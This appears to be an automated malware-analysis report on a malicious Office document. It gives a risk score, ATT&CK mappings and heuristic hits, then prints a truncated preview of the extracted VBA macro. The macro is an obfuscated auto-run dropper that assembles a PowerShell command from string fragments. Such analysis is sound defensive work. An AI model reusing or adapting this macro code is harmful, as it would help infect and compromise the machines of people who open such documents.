MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The specific family is not identifiable from the provided evidence.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38536 bytes |
SHA-256: 3a3af078865bc49b61199c075a5f9887df4a6b5a2cbd93b82009754034f86cc0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QELfsIJwCS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
OGriUD = (67817 * nrrko * AVRLnU + TOAGM) / 43797 / XOKQp
YSpFG = (54899 * icsvqL * oKGnXc + rqcHjK) / 2166 / hbvGa
ZSbJuR = (99560 * kzkjAG * vKFiRl + MRVdz) / 57431 / JucOI
MpZliTlFLJV = Application.Run("RUOzpEvmCYwsLd", "" + FjsjkmILWLz + DdRGRhb + uaMci + BrYnzUdPGJ + qtUSz + ssjwUUVii + UpREhuu + iFzXvE + bLcBbuswwN + QajCvdTub + MUsiQLu + wVdlVK + arrLmaw + CWmKGbtvME)
oQTVi = (53412 * IVsAF * jNqGwu + TAbbr) / 81288 / SiSwC
SRuvTd = (2415 * FKWfF * circGw + jLLZJQ) / 93780 / XvaZa
maYpEw = (89451 * zKVjUW * CpNKr + nprisZ) / 71671 / Cwwlu
End Sub
Attribute VB_Name = "TOYMmZlTWu"
Function uaMci()
On Error Resume Next
GqkIw = tHdrvJ / OhUnL / wIjwz - KjHYc * CQAovR + BRSVq * VFNBE + EQbbv * 44303 - mDlumj
EXVCjjNhSq = "" + tKZlDXKCjmtfc + fCAYVboERCiMPX + "poWe" + pObMDbSVhGYu + NJDoPjjbjRE + "rs" + jYKufAzD + ntDkfrO + "HE" + unpUJaIwDNiKHz + wWLsuJZwIPvL + "ll" + kVOKLUt + UXDwpnr + " " + Chr(34) + " " + kAiUCKzlOtLtiw + dJvwmzqsVrUrNk + ". " + jAbwVQSDL + AsIpbFw + "( $" + vjJkKqwLqHX + uJiVziMrslMt + "she" + NCtlQXfVAqqoiS + DCcQzwKFG + "llId"
JqJiM = 11353 / ufpLM + OAOuOd / VMjiR * 80767 / lGXazK - 66033 + rlnwT + 66626 / vGHsRJ / YjfLz * zGfQWL
mDwzrU = 82134 / IwVHGE + JniKz / kfhJQZ * 4413 / snfzX - 85832 + CtwUn + 64007 / QhuWLZ / WbvTFC * Qnbuo
NDItRtHLSEB = "" + PMCDHJdH + qtQdWZYk + "[1" + ruoNnJkFWcHN + qvqNBGuZPBHBj + "]" + Chr(43) + rzazFQVY + zYYknCcEc + "$She" + iKiPnRimGmd + ffhOjXUXBwEiWp + "ll" + iwEphImrjRwqli + QbEIVOUFSE + "id[1" + ihRcCnbp + PWspiSYil + "3]" + Chr(43) + "'" + jRukUiQcwX + aNCAWowGmvz + "X')" + PfjChoSNqvQW + ILNZuluSccRB + "(\" + Chr(34) + "$"
mjiOdK = 77552 / pcfQlN + wHPtRz / Pijwp * 70170 / ZWPFwW - 54372 + REzBwi + 12944 / AYEVI / sBIri * wijUD
MjnSiC = 8752 / jZRiKP + RmdiGp / ZVEamz * 7027 / kfwfA - 13123 + wopdK + 59138 / IMbfiK / nXjzQK * NHPHu
mAaatp = "" + PLmqQCq + PzYIPjYlPYQiN + "( S" + sHAmYfzp + ColNFGS + "eT" + ssFLjvIj + zcCOfwIBDlOR + "-iTE" + INumXKR + FEOmwTrPvJETYA + "M '" + PwEPwta + DTAVMiSBfwJRMM + "VArI" + VSIEmkNU + NMiAMdfn + "Ab" + qujflRs + oDkWCaaSd + "LE"
MTkBdR = jwrpKr * vcwwnP * (74028 - zVkwt / (77563 / WEOnW / 60627 / TqbLDz))
FjpEQ = Sfkjm * TiWbj * (56027 - VrJDs / (9961 / qjZlKB / 50671 / uKFfO))
lbtEijNJib = "" + qiwwhIjaQM + ORfXzUbnbX + ":o" + FIFXcMmiFAuPvq + XnXJZWEZw + "FS" + fzGuTNC + DIwEZcOOWP + "' " + qNPnzLWi + boIHizFaCtz + " '' " + OoTjwIqC + uplqGTBf + ")\" + Chr(34) + XhJvSzPJwM + kDBwjbaa + " " + Chr(43) + udORsIwHANn + hfXRwthGUbiFi + " [S" + mZFjHtmj + FGKpLVY + "tri" + TTIKbhjWa + MJTqUbIDdtu + "ng](" + PtnWRIGKFTVoi + CaXLiBovmTU + "'36K" + UWVYUSuiu + RvVHqzB + "10" + iBCWjUob + DwYtpiz + "8B"
LUvIR = tijhF * RiYiTU * (99127 - zdTkuG / (14303 / CjZsAh / 58682 / itkCpm))
ToiqMb = "" + KlSzKVNwHUiBL + LzjAHNpk + "11"
WFopwT = XDrdvJ * LHMnP * (26449 - WciPh / (85188 / FjNFAj / 38772 / RSpJZd))
AajwAN = ZtjUp * rKLtsM * (93061 - XfZqpF / (15988 / dVBSRJ / 90728 / BHHNcR))
ZlXbjsP = "" + zUvwzAoCQXz + aPbLRUi + "1;6" + albquzFopIDBPM + FjYDjMUHLsaiN + "7r" + vIEtKUJGrwchrZ + DiVMlFVL + "61K1" + UfBXXadOH + SmUwchGG + "10w" + hGhXDszIpns + AiEUYBDdRKzks + "10" + IYOEjomYT + idFSGSnuTS + "1r1" + iFazQwimK + ARYnvDOFkTET + "19%4" + zDhzwhzkLj + oVclNJst + "5%11" + hirqFMn + mAcRsApMImP + "1w9"
omPsdw = (vajRw / DFIck + 93648 * CNIME / lYwjHp - opFaMj + 78410 * iLUKSW)
EjBTnq = (dCosNi / rZcEhN + 42 * PBHfTC / ClNnos - FWGwO + 52802 * YqbEk)
EQXRYpZiEvX = "" + OpkjWQALIWYp + iZtGoTF + "8:1" + wYJrKjajisTX + EVmFLwc + "06;1" + XWLBLifbcQGl + Zpihmqwhf + "01:9" + pkBOuzGInl + fPFCRqGSStHNPh + "9%1" + zoqrFiVtdNiRA + cEqwRjnfqY + "16r3" + wcowMiQ + uitAtMZEHoRqUf + "2h78" + iwJLJASRbZ + OVijSZhazzXUO + "}101" + jWNbwfZijHzp + bZUvjpl
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.